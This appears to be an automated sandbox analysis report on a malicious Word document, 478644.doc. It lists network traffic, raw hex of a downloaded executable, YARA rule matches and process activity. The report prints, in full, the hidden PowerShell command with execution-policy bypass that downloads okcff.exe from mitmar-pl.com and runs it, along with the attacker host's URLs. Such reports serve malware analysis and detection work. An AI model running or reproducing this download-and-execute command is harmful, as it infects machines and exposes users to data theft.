00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:22 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:23 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
                    Source: global traffic | HTTP traffic detected: GET /okcff.exe HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: mitmar-pl.com Connection: Keep-Alive
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp | String found in binary or memory: httP://mitmar-pl.com/ok
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp | String found in binary or memory: httP://mitmar-pl.com/okcff.ex
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp | String found in binary or memory: httP://mitmar-pl.com/okcff.exe
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmp | String found in binary or memory: httP://mitmar-pl.com/okcff.exePE
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.441337667.0000000003819000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp | String found in binary or memory: http://mitmar-pl.com
                    Source: okcff.exe | String found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpeg
                    Source: okcff.exe, 00000009.00000000.439195914.00000000009F2000.00000020.00020000.sdmp, okcff.exe, 00000009.00000002.620997931.00000000009F2000.00000020.00020000.sdmp | String found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpegi
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.444532419.000000001B5C6000.00000004.00000001.sdmp | String found in binary or memory: http://mitmar-pl.com/okcff.exe
                    Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
                    Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/cclean
                    Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerv
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: okcff.exe | String found in binary or memory: https://google.com
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp | String found in binary or memory: https://google.com/
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmp | String found in binary or memory: https://google.comD
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmp
                    Source: unknown | DNS traffic detected: queries for: mitmar-pl.com
                    Source: global traffic | HTTP traffic detected: GET /okcff.exe HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: mitmar-pl.com Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /okcff.exe HTTP/1.1 Host: mitmar-pl.com Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /okcff.exe HTTP/1.1 Host: mitmar-pl.com Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1 Host: mitmar-pl.com Connection: Keep-Alive

                    System Summary:

                    Microsoft Office creates scripting files
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Office process drops PE file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
                    Document contains OLE streams with names of living off the land binaries
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr | Stream path '_1703660897/\x1Ole10Native' : 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<........................
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr | Stream path '_1703660925/\x1Ole10Native' : $|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z........................
                    Document contains a stream with embedded javascript code
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr | Stream path '_1703660897/\x1Ole10Native' : Found JS content: 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<........................
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr | Stream path '_1703660925/\x1Ole10Native' : Found JS content: $|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z........................
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\okcff.exe
                    .NET source code contains very large array initializations
                    Source: 41.0.okcff.exe.400000.5.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.cs | Large array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.7.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.cs | Large array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.9.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.cs | Large array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.13.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.cs | Large array initialization: .cctor: array initializer size 11933
                    Found suspicious RTF objects
                    Source: abdtfhgXgeghDp.ScT | Static RTF information: Object: 0 Offset: 000007CDh abdtfhgXgeghDp.ScT
                    Source: 9.2.okcff.exe.334b4b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp, type: MEMORY | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: 00000003.00000002.436663453.0000000000380000.00000004.00000020.sdmp, type: MEMORY | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr | OLE indicator application name: unknown
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_003D2519
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_003D4D79
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_02110940
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_02110E00
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0218D148
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0218778F
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_02184B98
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0218A8D0
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_02187F38
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_02188D88
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_02189022
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_02184EC8
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_02185C80
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_021A4AB0
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0542A0E3
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0542B370
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0542AEC0
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0542A12A
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0542A807
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0542A8F2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0542AF82
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 9_2_0542078A
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 41_2_00205330
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 41_2_00206350
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 41_2_00202099
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Code function: 41_2_00205678
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr | OLE indicator has summary info: false
                    Source: okcff[1].exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: okcff.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Memory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Memory allocated: 76E90000 page execute and read and write
                    Source: 478644.doc | Virustotal: Detection: 41%
                    Source: 478644.doc | ReversingLabs: Detection: 30%
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
